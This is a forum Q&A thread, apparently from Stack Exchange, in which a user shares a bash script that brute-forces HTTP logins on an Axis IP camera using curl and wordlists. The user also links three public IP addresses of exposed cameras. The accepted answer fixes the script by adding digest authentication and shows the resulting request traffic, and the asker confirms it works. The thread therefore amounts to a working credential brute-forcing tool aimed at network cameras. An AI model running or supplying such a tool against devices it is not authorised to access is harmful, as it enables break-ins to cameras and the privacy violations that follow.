# curl syntax in GET based HTTP logins

Tags: bash, curl, brute-force

For practice purposes I decided to create a simple bruteforcing bash script, that I succesuly used to solve DWVA. I then moved to IoT - namely my old IP camera. This is my code as of now:

```
#!/bin/bash

if [ "${#@}" != "2" ]; then
  echo "<command><host><path>"
  exit
fi

ip=$1
path=$2
for name in $(cat user.txt); do
 for pass in $(cat passwords.txt); do
echo  ${name}:${pass}
res="$(curl -si ${name}:${pass}@${ip}${path})"
check=$(echo "$res" | grep "HTTP/1.1 401 Unauthorised")
if [ "$check" != '' ]; then
  tput setaf 1
  echo "[FAILURE]"
  tput sgr0
else
  tput setaf 2
  echo "[SUCCESS]"
  tput sgr0
  exit
fi
sleep .1
  done;
done;
```

Despite obvious flaws - like reporting succes in case of network failure - it's as good as my 20 minutes coding jobs are. However, I can't seem to get the curl command syntax quite right. Camera in question is a simple Axis, running cramFS and a small scripting os. It's similar to a lot of publicly available cameras' login forms, like ones found [here](http://137.155.156.94), [here](http://192.119.202.110) or [here](http://208.126.26.1). A simple GET, yet I feel like I'm bashing my head against a wall. Any bit of ahint will be madly appreciated at this point.

I've taken the liberty to paste contents of first GET package:

```
AYGET /operator/basic.shtml?id=478 HTTP/1.1
Host: <target_host_ip>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://<target_host_ip>/view/view.shtml?id=282&imagepath=%2Fmjpg%2Fvideo.mjpg&size=1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Authorization: Digest username="root", realm="AXIS_ACCC8E4A2177", nonce="w3PH7XVmBQA=32dd7cd6ab72e0142e2266eb2a68f59e92995033", uri="/operator/basic.shtml?id=478", algorithm=MD5, response="025664e1ba362ebbf9c108b1acbcae97", qop=auth, nc=00000001, cnonce="a7e04861c3634d3b"
```

Package sent in return is a simple, dry 401.

PS.: Any powers that be - feel free to remove the IPs if they violate anything. Also feel free to point out grammar/spelling etc. mistakes since C2 exam is coming.

Answer (score 0, accepted):

It looks like those cameras don't simply use "Basic" HTTP auth with a base64 encoded username:password combo, but use [digest authentication](https://en.wikipedia.org/wiki/Digest_access_authentication) which involves a bit more.

Luckily, with cURL this just means you need to specify `--digest` on the command line to handle it properly.

Test the sequence of events yourself using:

```
curl --digest http://user:password@example.com/digest-url/
```

You should see something similar to:

```
*   Trying example.com...
* Connected to example.com (x.x.x.x) port 80 (#0)
* Server auth using Digest with user 'admin'
> GET /view/viewer_index.shtml?id=1323 HTTP/1.1
> Host: example.com
> User-Agent: curl/7.58.0
> Accept: */*
> 
< HTTP/1.1 401 Unauthorized
< Date: Wed, 08 Nov 1972 17:30:37 GMT
< Accept-Ranges: bytes
< Connection: close
< WWW-Authenticate: Digest realm="AXIS_MACADDR", nonce="00b035e7Y417961b2083fae7e4b2c4053e39ef8ba0b65b", stale=FALSE, qop="auth"
< WWW-Authenticate: Basic realm="AXIS_MACADDR"
< Content-Length: 189
< Content-Type: text/html; charset=ISO-8859-1
< 
* Closing connection 0
* Issue another request to this URL: 'http://admin:admin2@example.com/view/viewer_index.shtml?id=1323'
* Server auth using Digest with user 'admin'
> GET /view/viewer_index.shtml?id=1323 HTTP/1.1
> Host: example.com
> Authorization: Digest username="admin", realm="AXIS_MACADDR", nonce="00b035e7Y417961b2083fae7e4b2c4053e39ef8ba0b65b", uri="/view/viewer_index.shtml?id=1323", cnonce="NWIxZmY1YzA3NmY3ODczMDA0MDg4MTUwZDdjZmE0NGI=", nc=00000001, qop=auth, response="3b03254ef43bc4590cb00ba32defeaff"
> User-Agent: curl/7.58.0
> Accept: */*
> 
< HTTP/1.1 401 Unauthorized
< Date: Wed, 08 Nov 1972 17:30:37 GMT
< Accept-Ranges: bytes
< Connection: close
* Authentication problem. Ignoring this.
< WWW-Authenticate: Digest realm="AXIS_MACADDR", nonce="00b035e8Y8232884a74ee247fc1cc42cab0cdf59839b6f", stale=FALSE, qop="auth"
< WWW-Authenticate: Basic realm="AXIS_MACADDR"
< Content-Length: 189
< Content-Type: text/html; charset=ISO-8859-1
<
```

Comment: Absolute legend! Everything worked perfectly, thank you very much.